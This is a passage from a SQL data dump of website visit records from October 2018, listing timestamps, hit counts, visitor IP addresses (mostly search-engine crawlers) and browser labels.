36.149.106','other'),(317579,1539584347,1,1,0,0,'54.36.149.26','other'),(317580,1539584355,1,1,0,0,'54.36.148.198','other'),(317581,1539584649,1,1,0,0,'54.36.149.67','other'),(317582,1539584892,1,1,0,0,'54.36.148.108','other'),(317583,1539584893,1,1,0,0,'193.106.30.98','firefox'),(317584,1539585234,1,1,0,0,'8.29.198.25','other'),(317585,1539585266,1,1,0,0,'54.36.148.135','other'),(317586,1539585346,1,1,0,0,'54.36.148.33','other'),(317587,1539585401,1,1,0,0,'8.29.198.27','other'),(317588,1539585744,1,1,0,0,'54.36.149.75','other'),(317589,1539585846,1,1,0,0,'54.36.148.27','other'),(317590,1539586025,1,1,0,0,'157.55.39.131','other'),(317591,1539586160,1,1,0,0,'54.36.149.31','other'),(317592,1539586545,1,1,0,0,'54.36.148.246','other'),(317593,1539586759,1,1,0,0,'216.244.66.241','other'),(317594,1539586959,1,1,0,0,'157.55.39.135','other'),(317595,1539587481,1,1,0,0,'54.36.148.180','other'),(317596,1539588145,1,1,0,0,'54.36.148.79','other'),(317597,1539588462,1,1,0,0,'54.36.148.89','other'),(317598,1539588501,1,1,0,0,'216.244.66.241','other'),(317599,1539588803,1,1,0,0,'54.36.148.65','other'),(317600,1539588924,1,1,0,0,'54.36.148.128','other'),(317601,1539588979,1,1,0,0,'54.36.148.92','other'),(317602,1539588993,1,1,0,0,'54.36.148.25','other'),(317603,1539589066,1,1,0,0,'8.29.198.26','other'),(317604,1539589108,1,1,0,0,'66.249.64.201','chrome'),(317605,1539589254,1,1,0,0,'54.36.148.254','other'),(317606,1539589272,1,1,0,0,'54.36.148.166','other'),(317607,1539589822,1,1,0,0,'54.36.149.76','other'),(317608,1539589981,1,1,0,0,'54.36.149.103','other'),(317609,1539590387,1,1,0,0,'54.36.148.220','other'),(317610,1539590473,1,1,0,0,'54.36.149.30','other'),(317611,1539590545,1,1,0,0,'54.36.149.25','other'),(317612,1539590684,1,1,0,0,'54.36.148.15','other'),(317613,1539590933,1,1,0,0,'54.36.148.200','other'),(317614,1539591240,1,1,0,0,'54.36.148.53','other'),(317615,1539591500,1,1,0,0,'54.36.148.62','other'),(317616,1539591778,1,1,0,0,'176.37.70.97','chrome'),(317617,1539591854,1,1,0,0,'54.36.148.244','other'),(317618,1539592081,1,1,0,0,'54.36.148.187','other'),(317619,1539592172,1,1,0,0,'108.59.8.70','other'),(317620,1539592246,1,1,0,0,'54.36.148.240','other'),(317621,1539592316,1,1,0,0,'54.36.149.16','other'),(317622,1539592963,1,1,0,0,'54.36.148.204','other'),(317623,1539593311,1,1,0,0,'54.36.148.248','other'),(317624,1539593862,1,1,0,0,'54.36.149.100','other'),(317625,1539594199,1,1,0,0,'54.36.148.64','other'),(317626,1539594529,1,1,0,0,'54.36.148.110','other'),(317627,1539595441,1,1,0,0,'216.244.66.241','other'),(317628,1539595453,1,1,0,0,'54.36.148.109','other'),(317629,1539595546,1,1,0,0,'54.36.149.52','other'),(317630,1539595565,1,1,0,0,'54.36.148.53','other'),(317631,1539595730,1,1,0,0,'54.36.148.218','other'),(317632,1539596060,1,1,0,0,'8.29.198.25','other'),(317633,1539596173,1,1,0,0,'54.36.149.100','other'),(317634,1539596187,1,1,0,0,'54.36.148.224','other'),(317635,1539596241,1,1,0,0,'8.29.198.26','other'),(317636,1539596405,1,1,0,0,'40.77.167.132','other'),(317637,1539596583,1,1,0,0,'66.249.64.61','chrome'),(317638,1539596683,1,1,0,0,'207.46.13.173','other'),(317639,1539596699,1,1,0,0,'54.36.148.190','other'),(317640,1539596829,1,1,0,0,'54.36.149.79','other'),(317641,1539596935,1,1,0,0,'54.36.148.55','other'),(317642,1539597437,1,1,0,0,'54.36.149.2','other'),(317643,1539597539,1,1,0,0,'54.36.149.102','other'),(317644,1539597854,1,1,0,0,'40.77.167.132','other'),(317645,1539597887,1,1,0,0,'54.36.148.75','other'),(317646,1539597903,1,1,0,0,'54.36.148.111','other'),(317647,1539598168,2,2,0,0,'216.244.66.241','other'),(317648,1539598253,1,1,0,0,'54.36.148.162','other'),(317649,1539598660,1,1,0,0,'54.36.149.46','other'),(317650,1539598837,1,1,0,0,'54.36.149.50','other'),(317651,1539599037,1,1,0,0,'54.36.149.96','other'),(317652,1539599153,1,1,0,0,'54.36.148.219','other'),(317653,1539599175,1,1,0,0,'54.36.149.27','other'),(317654,1539599901,1,1,0,0,'8.29.198.26','other'),(317655,1539600070,1,1,0,0,'54.36.149.64','other'),(317656,1539600261,1,1,0,0,'207.46.13.34','other'),(317657,1539600324,1,1,0,0,'54.36.148.55','other'),(317658,1539601259,2,2,0,0,'216.244.66.241','other'),(317659,1539601276,1,1,0,0,'54.36.148.193','other'),(317660,1539601369,1,1,0,0,'54.36.149.50','other'),(317661,1539601647,1,1,0,0,'54.36.148.189','other'),(317662,1539601776,1,1,0,0,'54.36.148.12','other'),(317663,1539601778,1,1,0,0,'54.36.148.164','other'),(317664,1539602428,1,1,0,0,'54.36.148.126','other'),(317665,1539603484,1,1,0,0,'54.36.148.20','other'),(317666,1539603635,1,1,0,0,'54.36.149.53','other'),(317667,1539603776,1,1,0,0,'54.36.148.31','other'),(317668,1539603892,1,1,0,0,'54.36.149.55','other'),(317669,1539603925,1,1,0,0,'54.36.148.218','other'),(317670,1539603938,1,1,0,0,'207.46.13.174','other'),(317671,1539603965,1,1,0,0,'54.36.148.108','other'),(317672,1539604049,1,1,0,0,'54.36.148.134','other'),(317673,1539604101,1,1,0,0,'54.36.148.99','other'),(317674,1539604152,1,1,0,0,'54.36.148.142','other'),(317675,1539604185,1,1,0,0,'54.36.148.155','other'),(317676,1539604257,1,1,0,0,'54.36.148.122','other'),(317677,1539604301,1,1,0,0,'54.36.149.61','other'),(317678,1539604542,1,1,0,0,'54.36.148.38','other'),(317679,1539604578,1,1,0,0,'54.36.149.42','other'),(317680,1539604624,1,1,0,0,'46.229.168.146','other'),(317681,1539604688,1,1,0,0,'54.36.149.91','other'),(317682,1539604770,1,1,0,0,'54.36.148.77','other'),(317683,1539604964,1,1,0,0,'54.36.148.202','other'),(317684,1539605233,1,1,0,0,'54.36.148.218','other'),(317685,1539605251,1,1,0,0,'54.36.149.10','other'),(317686,1539605339,1,1,0,0,'54.36.148.195','other'),(317687,1539605675,1,1,0,0,'54.36.148.106','other'),(317688,1539605690,1,1,0,0,'54.36.148.27','other'),(317689,1539605801,1,1,0,0,'54.36.149.22','other'),(317690,1539605927,1,1,0,0,'54.36.149.44','other'),(317691,1539606174,1,1,0,0,'54.36.148.176','other'),(317692,1539606371,1,1,0,0,'54.36.148.114','other'),(317693,1539606502,1,1,0,0,'54.36.148.203','other'),(317694,1539606644,1,1,0,0,'54.36.148.80','other'),(317695,1539606894,1,1,0,0,'8.29.198.25','other'),(317696,1539606938,1,1,0,0,'178.154.244.11','other'),(317697,1539606997,1,1,0,0,'54.36.148.37','other'),(317698,1539607068,1,1,0,0,'8.29.198.27','other'),(317699,1539607113,1,1,0,0,'87.250.224.47','other'),(317700,1539607133,1,1,0,0,'54.36.148.151','other'),(317701,1539607481,1,1,0,0,'54.36.149.8','other'),(317702,1539607510,1,1,0,0,'178.154.244.29','other'),(317703,1539607742,1,1,0,0,'54.36.149.29','other'),(317704,1539608439,1,1,0,0,'54.36.149.33','other'),(317705,1539608457,1,1,0,0,'54.36.148.210','other'),(317706,1539608490,1,1,0,0,'54.36.148.115','other'),(317707,1539608522,1,1,0,0,'54.36.149.92','other'),(317708,1539608594,2,2,0,0,'54.36.148.94','other'),(317709,1539608766,1,1,0,0,'54.36.149.4','other'),(317710,1539608986,1,1,0,0,'54.36.149.3','other'),(317711,1539609170,1,1,0,0,'54.36.148.163','other'),(317712,1539609601,1,1,0,0,'54.36.148.98','other'),(317713,1539609620,1,1,0,0,'54.36.148.42','other'),(317714,1539609626,1,1,0,0,'54.36.148.204','other'),(317715,1539609705,1,1,0,0,'54.36.148.233','other'),(317716,1539610029,1,1,0,0,'178.154.244.29','other'),(317717,1539610042,1,1,0,0,'54.36.149.98','other'),(317718,1539610244,1,1,0,0,'54.36.148.74','other'),(317719,1539610491,1,1,0,0,'46.229.168.130','other'),(317720,1539610733,1,1,0,0,'8.29.198.26','other'),(317721,1539610845,2,2,0,0,'66.249.64.199','chrome'),(317722,1539610847,1,1,0,0,'54.36.148.188','other'),(317723,1539611303,1,1,0,0,'54.36.149.10','other'),(317724,1539611381,1,1,0,0,'54.36.149.99','other'),(317725,1539611448,1,1,0,0,'54.36.148.95','other'),(317726,1539611641,1,1,0,0,'54.36.148.202','other'),(317727,1539611672,1,1,0,0,'54.36.148.167','other'),(317728,1539611898,1,1,0,0,'54.36.148.164','other'),(317729,1539612154,1,1,0,0,'54.36.148.235','other'),(317730,1539612342,1,1,0,0,'54.36.149.87','other'),(317731,1539612668,1,1,0,0,'207.46.13.79','other'),(317732,1539612777,1,1,0,0,'54.36.149.11','other'),(317733,1539612789,1,1,0,0,'54.36.148.132','other'),(317734,1539613045,1,1,0,0,'54.36.149.16','other'),(317735,1539613138,1,1,0,0,'54.36.148.50','other'),(317736,1539613251,1,1,0,0,'66.249.64.57','chrome'),(317737,1539613343,1,1,0,0,'54.36.148.18','other'),(317738,1539613388,1,1,0,0,'54.36.148.183','other'),(317739,1539613494,1,1,0,0,'207.46.13.34','other'),(317740,1539614190,1,1,0,0,'188.230.43.254','other'),(317741,1539614287,1,1,0,0,'54.36.149.44','other'),(317742,1539614537,1,1,0,0,'54.36.148.155','other'),(317743,1539614654,1,1,0,0,'54.36.148.66','other'),(317744,1539614914,1,1,0,0,'54.36.148.153','other'),(317745,1539615119,1,1,0,0,'35.202.99.105','other'),(317746,1539615121,1,1,0,0,'54.36.148.97','other'),(317747,1539615158,1,1,0,0,'54.36.148.219','other'),(317748,1539615522,1,1,0,0,'66.249.64.28','chrome'),(317749,1539615549,1,1,0,0,'54.36.149.23','other'),(317750,1539615552,1,1,0,0,'54.36.148.223','other'),(317751,1539615767,1,1,0,0,'54.36.148.147','other'),(317752,1539615987,1,1,0,0,'54.36.148.64','other'),(317753,1539616017,1,1,0,0,'54.36.148.200','other'),(317754,1539616251,1,1,0,0,'54.36.149.30','other'),(317755,1539616474,1,1,0,0,'216.244.66.241','other'),(317756,1539616585,1,1,0,0,'188.230.43.254','other'),(317757,1539616782,1,1,0,0,'54.36.148.221','other'),(317758,1539617069,1,1,0,0,'46.229.168.150','other'),(317759,1539617318,1,1,0,0,'54.36.148.180','other'),(317760,1539617736,1,1,0,0,'8.29.198.25','other'),(317761,1539617811,1,1,0,0,'54.36.148.38','other'),(317762,1539617828,1,1,0,0,'54.36.148.61','other'),(317763,1539617894,1,1,0,0,'8.29.198.26','other'),(317764,1539618272,1,1,0,0,'51.255.65.46','other'),(317765,1539618843,1,1,0,0,'54.36.148.254','other'),(317766,1539618985,1,1,0,0,'188.230.43.254','other'),(317767,1539619122,2,2,0,0,'54.165.59.7','other'),(317768,1539620146,1,1,0,0,'54.36.148.32','other'),(317769,1539620286,1,1,0,0,'54.36.148.20','other'),(317770,1539620513,1,1,0,0,'54.36.148.31','other'),(317771,1539620559,1,1,0,0,'54.36.149.104','other'),(317772,1539620588,1,1,0,0,'54.36.149.29','other'),(317773,1539620712,1,1,0,0,'94.130.9.183','other'),(317774,1539620722,1,1,0,0,'54.36.149.60','other'),(317775,1539620858,1,1,0,0,'207.46.13.34','other'),(317776,1539620899,1,1,0,0,'54.36.148.175','other'),(317777,1539621294,1,1,0,0,'54.165.59.7','other'),(317778,1539621500,6,6,0,0,'216.244.66.241','other'),(317779,1539621588,1,1,0,0,'8.29.198.26','other'),(317780,1539622198,1,1,0,0,'54.36.148.77','other'),(317781,1539622403,1,1,0,0,'54.36.148.175','other'),(317782,1539622459,1,1,0,0,'54.36.148.95','other'),(317783,1539622487,1,1,0,0,'54.36.149.73','other'),(317784,1539622502,1,1,0,0,'54.36.148.181','other'),(317785,1539622713,1,1,0,0,'37.54.23.36','chrome'),(317786,1539622793,1,1,0,0,'66.249.64.28','chrome'),(317787,1539622837,1,1,0,0,'54.36.148.65','other'),(317788,1539622843,1,1,0,0,'163.172.4.153','chrome'),(317789,1539622863,1,1,0,0,'216.244.66.241','other'),(317790,1539623025,1,1,0,0,'77.111.244.66','chrome'),(317791,1539623071,1,1,0,0,'54.36.148.69','other'),(317792,1539623517,1,1,0,0,'54.36.148.27','other'),(317793,1539623642,1,1,0,0,'54.36.148.71','other'),(317794,1539624003,1,1,0,0,'54.36.148.15','other'),(317795,1539624004,1,1,0,0,'54.36.149.16','other'),(317796,1539624311,1,1,0,0,'54.36.148.156','other'),(317797,1539624648,1,1,0,0,'54.36.148.140','other'),(317798,1539624865,1,1,0,0,'54.36.148.171','other'),(317799,1539625344,1,1,0,0,'54.36.148.245','other'),(317800,1539625583,1,1,0,0,'54.165.59.7','other'),(317801,1539625651,1,1,0,0,'54.36.149.41','other'),(317802,1539625662,1,1,0,0,'207.46.13.79','other'),(317803,1539625990,1,1,0,0,'54.36.148.150','other'),(317804,1539626348,1,1,0,0,'54.36.149.73','other'),(317805,1539627024,1,1,0,0,'54.36.149.6','other'),(317806,1539627492,1,1,0,0,'54.36.148.220','other'),(317807,1539627750,1,1,0,0,'54.36.148.145','other'),(317808,1539628177,1,1,0,0,'54.36.148.91','other'),(317809,1539628340,1,1,0,0,'54.36.149.101','other'),(317810,1539628422,1,1,0,0,'54.36.149.82','other'),(317811,1539628469,1,1,0,0,'54.36.149.22','other'),(317812,1539628484,1,1,0,0,'54.36.148.214','other'),(317813,1539628568,1,1,0,0,'8.29.198.25','other'),(317814,1539628729,1,1,0,0,'8.29.198.27','other'),(317815,1539628949,1,1,0,0,'54.36.148.182','other'),(317816,1539629083,1,1,0,0,'54.36.148.15','other'),(317817,1539629145,1,1,0,0,'54.36.148.57','other'),(317818,1539629659,1,1,0,0,'54.36.148.118','other'),(317819,1539629712,1,1,0,0,'54.36.149.67','other'),(317820,1539629835,1,1,0,0,'54.36.149.58','other'),(317821,1539629885,1,1,0,0,'54.36.149.34','other'),(317822,1539629888,1,1,0,0,'54.36.148.37','other'),(317823,1539629941,1,1,0,0,'54.36.148.192','other'),(317824,1539630149,1,1,0,0,'40.77.167.132','other'),(317825,1539630159,1,1,0,0,'46.229.168.129','other'),(317826,1539630234,1,1,0,0,'54.36.148.200','other'),(317827,1539630285,1,1,0,0,'54.36.148.232','other'),(317828,1539630708,1,1,0,0,'66.249.64.28','chrome'),(317829,1539630805,1,1,0,0,'54.36.149.67','other'),(317830,1539631034,1,1,0,0,'66.249.64.57','chrome'),(317831,1539631113,1,1,0,0,'46.229.168.135','other'),(317832,1539631119,1,1,0,0,'54.36.148.252','other'),(317833,1539631572,1,1,0,0,'66.249.64.29','chrome'),(317834,1539632426,1,1,0,0,'8.29.198.27','other'),(317835,1539632495,1,1,0,0,'54.36.149.26','other'),(317836,1539632501,1,1,0,0,'54.36.148.249','other'),(317837,1539632610,1,1,0,0,'54.36.148.183','other'),(317838,1539633064,1,1,0,0,'54.36.149.36','other'),(317839,1539633267,1,1,0,0,'51.255.65.46','other'),(317840,1539633592,1,1,0,0,'178.154.244.29','other'),(317841,1539633696,1,1,0,0,'54.36.148.250','other'),(317842,1539634115,1,1,0,0,'54.36.148.182','other'),(317843,1539634214,1,1,0,0,'54.36.149.104','other'),(317844,1539634255,1,1,0,0,'54.36.148.93','other'),(317845,1539634693,1,1,0,0,'216.244.66.241','other'),(317846,1539634956,1,1,0,0,'54.36.148.216','other'),(317847,1539636029,1,1,0,0,'54.36.148.246','other'),(317848,1539636468,1,1,0,0,'54.36.149.93','other'),(317849,1539637051,1,1,0,0,'178.255.215.94','other'),(317850,1539637189,1,1,0,0,'54.36.148.86','other'),(317851,1539637291,1,1,0,0,'54.36.148.249','other'),(317852,1539637760,1,1,0,0,'54.36.148.129','other'),(317853,1539638688,1,1,0,0,'54.36.148.179','other'),(317854,1539638748,1,1,0,0,'54.36.148.198','other'),(317855,1539638884,1,1,0,0,'54.36.148.123','other'),(317856,1539638906,1,1,0,0,'157.55.39.241','other'),(317857,1539638935,1,1,0,0,'66.249.64.29','chrome'),(317858,1539639031,1,1,0,0,'54.36.148.27','other'),(317859,1539639403,1,1,0,0,'8.29.198.25','other'),(317860,1539639579,1,1,0,0,'8.29.198.27','other'),(317861,1539639929,1,1,0,0,'54.36.148.220','other'),(317862,1539639961,1,1,0,0,'54.36.149.107','other'),(317863,1539639970,1,1,0,0,'54.36.148.38','other'),(317864,1539640234,1,1,0,0,'54.36.149.46','other'),(317865,1539640290,1,1,0,0,'54.36.149.25','other'),(317866,1539640714,1,1,0,0,'54.36.148.53','other'),(317867,1539640898,1,1,0,0,'54.165.59.7','other'),(317868,1539641072,1,1,0,0,'66.249.64.30','chrome'),(317869,1539641146,1,1,0,0,'54.36.148.165','other'),(317870,1539641300,1,1,0,0,'157.55.39.241','other'),(317871,1539641405,1,1,0,0,'54.36.148.95','other'),(317872,1539641435,1,1,0,0,'54.36.149.23','other'),(317873,1539641499,1,1,0,0,'54.36.149.52','other'),(317874,1539641613,1,1,0,0,'54.36.148.128','other'),(317875,1539641838,1,1,0,0,'54.36.149.12','other'),(317876,1539641886,1,1,0,0,'54.36.148.134','other'),(317877,1539642046,1,1,0,0,'216.244.66.241','other'),(317878,1539642107,1,1,0,0,'46.229.168.136','other'),(317879,1539643134,1,1,0,0,'54.36.148.171','other'),(317880,1539643275,1,1,0,0,'8.29.198.25','other'),(317881,1539643427,1,1,0,0,'54.36.149.62','other'),(317882,1539643614,1,1,0,0,'54.36.148.189','other'),(317883,1539643718,1,1,0,0,'54.36.149.40','other'),(317884,1539643781,1,1,0,0,'54.36.149.20','other'),(317885,1539643966,1,1,0,0,'54.36.148.222','other'),(317886,1539644128,1,1,0,0,'178.17.166.147','other'),(317887,1539644204,1,1,0,0,'54.36.148.128','other'),(317888,1539644515,1,1,0,0,'54.36.149.15','other'),(317889,1539644567,1,1,0,0,'54.36.148.114','other'),(317890,1539644717,1,1,0,0,'54.36.148.124','other'),(317891,1539645047,1,1,0,0,'193.106.30.98','firefox'),(317892,1539645286,1,1,0,0,'54.36.148.161','other'),(317893,1539645639,1,1,0,0,'46.229.168.149','other'),(317894,1539645876,1,1,0,0,'54.36.149.88','other'),(317895,1539646157,2,2,0,0,'178.154.244.29','other'),(317896,1539646356,1,1,0,0,'54.36.149.105','other'),(317897,1539646484,1,1,0,0,'178.154.244.11','other'),(317898,1539646733,1,1,0,0,'54.36.148.156','other'),(317899,1539646813,1,1,0,0,'54.36.149.96','other'),(317900,1539646955,1,1,0,0,'54.36.149.104','other'),(317901,1539647103,3,3,0,0,'178.154.244.29','other'),(317902,1539647117,1,1,0,0,'54.36.149.68','other'),(317903,1539647212,1,1,0,0,'54.36.148.93','other'),(317904,1539647366,1,1,0,0,'216.244.66.241','other'),(317905,1539647384,1,1,0,0,'80.252.153.33','firefox'),(317906,1539647837,1,1,0,0,'54.36.148.163','other'),(317907,1539647887,1,1,0,0,'54.36.149.98','other'),(317908,1539647919,1,1,0,0,'54.36.148.140','other'),(317909,1539647982,1,1,0,0,'54.36.148.39','other'),(317910,1539648285,1,1,0,0,'54.36.148.116','other'),(317911,1539648984,1,1,0,0,'66.249.64.29','chrome'),(317912,1539649284,1,1,0,0,'54.36.148.248','other'),(317913,1539649411,1,1,0,0,'54.36.148.100','other'),(317914,1539649425,5,5,0,0,'178.154.244.29','other'),(317915,1539649803,1,1,0,0,'66.249.64.30','chrome'),(317916,1539649903,1,1,0,0,'54.36.148.244','other'),(317917,1539649942,1,1,0,0,'216.244.66.241','other'),(317918,1539650148,1,1,0,0,'54.36.149.66','other'),(317919,1539650231,1,1,0,0,'8.29.198.25','other'),(317920,1539650405,1,1,0,0,'8.29.198.27','other'),(317921,1539650582,2,2,0,0,'178.154.244.11','other'),(317922,1539650732,1,1,0,0,'46.229.168.149','other'),(317923,1539650772,1,1,0,0,'54.36.148.188','other'),(317924,1539651010,2,2,0,0,'178.154.244.29','other'),(317925,1539651783,1,1,0,0,'54.36.149.101','other'),(317926,1539652183,1,1,0,0,'87.250.224.64','other'),(317927,1539652235,1,1,0,0,'141.8.183.23','other'),(317928,1539652364,1,1,0,0,'54.36.149.51','other'),(317929,1539652604,1,1,0,0,'207.46.13.79','other'),(317930,1539653776,1,1,0,0,'54.36.148.217','other'),(317931,1539654113,1,1,0,0,'8.29.198.26','other'),(317932,1539654121,1,1,0,0,'54.36.148.179','other'),(317933,1539654151,1,1,0,0,'54.36.148.49','other'),(317934,1539654366,1,1,0,0,'52.53.201.78','chrome'),(317935,1539654499,1,1,0,0,'54.36.148.109','other'),(317936,1539654517,1,1,0,0,'54.36.148.212','other'),(317937,1539654682,1,1,0,0,'178.154.244.29','other'),(317938,1539654766,1,1,0,0,'54.36.149.86','other'),(317939,1539655076,1,1,0,0,'54.36.149.39','other'),(317940,1539655450,1,1,0,0,'54.36.148.20','other'),(317941,1539655452,1,1,0,0,'207.46.13.55','other'),(317942,1539655484,1,1,0,0,'54.36.148.51','other'),(317943,1539655495,1,1,0,0,'54.36.148.47','other'),(317944,1539655532,1,1,0,0,'54.36.148.151','other'),(317945,1539655903,1,1,0,0,'54.36.148.176','other'),(317946,1539655951,1,1,0,0,'54.36.148.185','other'),(317947,1539656052,1,1,0,0,'66.249.64.28','chrome'),(317948,1539656507,1,1,0,0,'54.36.149.13','other'),(317949,1539656693,1,1,0,0,'54.36.148.21','other'),(317950,1539656833,1,1,0,0,'54.36.148.226','other'),(317951,1539657270,1,1,0,0,'54.36.148.182','other'),(317952,1539657497,1,1,0,0,'54.36.148.237','other'),(317953,1539657613,1,1,0,0,'54.36.149.66','other'),(317954,1539657710,1,1,0,0,'54.36.149.104','other'),(317955,1539658289,1,1,0,0,'54.36.148.23','other'),(317956,1539658765,1,1,0,0,'54.165.59.7','other'),(317957,1539658800,1,1,0,0,'54.36.148.226','other'),(317958,1539658863,1,1,0,0,'54.36.148.12','other'),(317959,1539659078,1,1,0,0,'54.36.148.114','other'),(317960,1539659092,1,1,0,0,'46.229.168.145','other'),(317961,1539659118,1,1,0,0,'54.36.148.237','other'),(317962,1539659314,1,1,0,0,'54.36.148.252','other'),(317963,1539659688,1,1,0,0,'54.36.148.45','other'),(317964,1539660163,1,1,0,0,'54.36.149.78','other'),(317965,1539660287,1,1,0,0,'54.36.148.255','other'),(317966,1539660362,10,10,0,0,'5.9.138.189','other'),(317967,1539660507,1,1,0,0,'54.36.149.66','other'),(317968,1539660652,2,2,0,0,'54.36.149.37','other'),(317969,1539660713,1,1,0,0,'54.36.148.89','other'),(317970,1539661054,1,1,0,0,'8.29.198.27','other'),(317971,1539661189,1,1,0,0,'54.36.148.181','other'),(317972,1539661207,1,1,0,0,'54.36.149.6','other'),(317973,1539661232,1,1,0,0,'8.29.198.25','other'),(317974,1539661432,1,1,0,0,'54.36.149.93','other'),(317975,1539661552,109,109,0,0,'34.192.116.178','chrome'),(317976,1539661554,1,1,0,0,'34.192.116.178','other'),(317977,1539661647,1,1,0,0,'54.36.148.143','other'),(317978,1539661719,1,1,0,0,'207.46.13.55','other'),(317979,1539661972,1,1,0,0,'54.36.148.140','other'),(317980,1539662035,1,1,0,0,'54.36.148.252','other'),(317981,1539662245,1,1,0,0,'54.36.148.48','other'),(317982,1539662623,1,1,0,0,'54.36.148.43','other'),(317983,1539662702,1,1,0,0,'46.229.168.147','other'),(317984,1539662891,1,1,0,0,'216.244.66.241','other'),(317985,1539662957,1,1,0,0,'54.36.149.79','other'),(317986,1539662975,1,1,0,0,'54.36.148.46','other'),(317987,1539663257,1,1,0,0,'54.36.148.56','other'),(317988,1539663531,1,1,0,0,'66.249.64.30','chrome'),(317989,1539663610,1,1,0,0,'54.36.148.133','other'),(317990,1539664105,1,1,0,0,'180.76.15.158','other'),(317991,1539664113,1,1,0,0,'46.229.168.137','other'),(317992,1539664187,1,1,0,0,'54.36.148.239','other'),(317993,1539664248,1,1,0,0,'54.36.148.254','other'),(317994,1539664472,1,1,0,0,'54.36.148.125','other'),(317995,1539664911,1,1,0,0,'54.36.148.104','other'),(317996,1539664954,1,1,0,0,'8.29.198.25','other'),(317997,1539665430,1,1,0,0,'54.36.148.173','other'),(317998,1539665911,1,1,0,0,'54.36.148.209','other'),(317999,1539666051,1,1,0,0,'178.255.215.94','other'),(318000,1539666105,1,1,0,0,'180.76.15.155','other'),(318001,1539666356,2,2,0,0,'66.249.66.155','chrome'),(318002,1539666865,1,1,0,0,'54.36.148.41','other'),(318003,1539667023,1,1,0,0,'54.36.148.107','other'),(318004,1539667057,1,1,0,0,'54.36.149.0','other'),(318005,1539667109,1,1,0,0,'54.36.149.86','other'),(318006,1539667253,1,1,0,0,'54.36.148.147','other'),(318007,1539667353,1,1,0,0,'54.36.148.37','other'),(318008,1539667423,1,1,0,0,'178.154.244.29','other'),(318009,1539667770,1,1,0,0,'54.36.148.173','other'),(318010,1539668057,1,1,0,0,'13.66.139.0','other'),(318011,1539668517,2,2,0,0,'46.229.168.152','other'),(318012,1539668530,1,1,0,0,'54.36.148.254','other'),(318013,1539668779,1,1,0,0,'54.36.148.167','other'),(318014,1539668886,1,1,0,0,'54.36.149.99','other'),(318015,1539668890,1,1,0,0,'54.36.148.80','other'),(318016,1539669103,1,1,0,0,'54.36.148.93','other'),(318017,1539669117,1,1,0,0,'66.249.66.59','chrome'),(318018,1539669309,1,1,0,0,'66.249.66.155','chrome'),(318019,1539669418,1,1,0,0,'180.76.15.140','other'),(318020,1539669602,1,1,0,0,'54.36.149.100','other'),(318021,1539669656,1,1,0,0,'54.36.148.32','other'),(318022,1539669896,1,1,0,0,'108.59.8.70','other'),(318023,1539669956,1,1,0,0,'54.36.148.51','other'),(318024,1539670071,1,1,0,0,'54.36.148.195','other'),(318025,1539670591,1,1,0,0,'91.196.178.73','chrome'),(318026,1539670665,1,1,0,0,'46.229.168.149','other'),(318027,1539670721,1,1,0,0,'54.36.148.193','other'),(318028,1539670726,1,1,0,0,'54.36.148.212','other'),(318029,1539670948,1,1,0,0,'212.1.64.153','chrome'),(318030,1539671240,1,1,0,0,'54.36.148.242','other'),(318031,1539671299,1,1,0,0,'54.36.148.57','other'),(318032,1539671389,1,1,0,0,'66.249.66.155','chrome'),(318033,1539671413,1,1,0,0,'91.196.179.138','chrome'),(318034,1539671564,1,1,0,0,'54.36.148.203','other'),(318035,1539671679,1,1,0,0,'54.36.148.30','other'),(318036,1539671714,1,1,0,0,'54.36.148.253','other'),(318037,1539671721,4,4,0,0,'216.244.66.241','other'),(318038,1539671736,1,1,0,0,'54.36.148.132','other'),(318039,1539671887,1,1,0,0,'8.29.198.25','other'),(318040,1539672002,1,1,0,0,'217.117.75.167','firefox'),(318041,1539672056,1,1,0,0,'8.29.198.27','other'),(318042,1539672063,1,1,0,0,'54.36.149.17','other'),(318043,1539672081,1,1,0,0,'54.36.148.190','other'),(318044,1539672246,1,1,0,0,'54.36.148.223','other'),(318045,1539672248,1,1,0,0,'54.36.148.116','other'),(318046,1539672303,2,2,0,0,'91.196.177.65','chrome'),(318047,1539672329,1,1,0,0,'54.36.148.136','other'),(318048,1539672356,1,1,0,0,'91.196.178.73','chrome'),(318049,1539672951,1,1,0,0,'216.244.66.241','other'),(318050,1539672987,1,1,0,0,'54.36.148.245','other'),(318051,1539673100,2,2,0,0,'95.134.189.3','chrome'),(318052,1539673653,1,1,0,0,'54.36.148.64','other'),(318053,1539674261,1,1,0,0,'5.188.210.11','chrome'),(318054,1539674304,1,1,0,0,'91.196.178.82','firefox'),(318055,1539674483,1,1,0,0,'209.126.90.121','chrome'),(318056,1539674727,1,1,0,0,'178.154.244.29','other'),(318057,1539674804,1,1,0,0,'180.76.15.29','other'),(318058,1539675002,1,1,0,0,'54.36.148.182','other'),(318059,1539675282,1,1,0,0,'54.36.148.245','other'),(318060,1539675496,2,2,0,0,'66.249.66.156','chrome'),(318061,1539675635,1,1,0,0,'54.36.148.83','other'),(318062,1539675705,1,1,0,0,'54.36.149.33','other'),(318063,1539675796,1,1,0,0,'8.29.198.26','other'),(318064,1539675897,1,1,0,0,'216.244.66.241','other'),(318065,1539676192,1,1,0,0,'54.36.149.105','other'),(318066,1539676607,1,1,0,0,'54.36.148.58','other'),(318067,1539676671,1,1,0,0,'95.132.57.124','firefox'),(318068,1539677102,1,1,0,0,'54.36.148.61','other'),(318069,1539677242,1,1,0,0,'54.36.149.8','other'),(318070,1539677672,1,1,0,0,'54.36.149.30','other'),(318071,1539677724,1,1,0,0,'207.46.13.65','other'),(318072,1539678202,1,1,0,0,'46.229.168.143','other'),(318073,1539678266,1,1,0,0,'54.36.149.44','other'),(318074,1539678346,1,1,0,0,'54.36.148.10','other'),(318075,1539678508,1,1,0,0,'91.196.121.9','chrome'),(318076,1539678729,1,1,0,0,'54.36.149.87','other'),(318077,1539678752,1,1,0,0,'95.132.57.124','firefox'),(318078,1539678859,1,1,0,0,'54.36.148.165','other'),(318079,1539679010,1,1,0,0,'54.36.149.64','other'),(318080,1539679103,1,1,0,0,'54.36.148.35','other'),(318081,1539679309,1,1,0,0,'31.43.31.17','chrome'),(318082,1539679392,1,1,0,0,'54.36.148.202','other'),(318083,1539679465,1,1,0,0,'62.205.134.182','msie'),(318084,1539679721,2,2,0,0,'95.213.141.126','opera'),(318085,1539679795,1,1,0,0,'216.244.66.241','other'),(318086,1539680317,1,1,0,0,'54.36.148.137','other'),(318087,1539680406,1,1,0,0,'66.249.66.155','chrome'),(318088,1539680529,1,1,0,0,'178.154.244.29','other'),(318089,1539681377,1,1,0,0,'46.211.98.12','other'),(318090,1539681573,1,1,0,0,'54.36.148.170','other'),(318091,1539681694,1,1,0,0,'91.196.177.65','chrome'),(318092,1539681958,1,1,0,0,'66.249.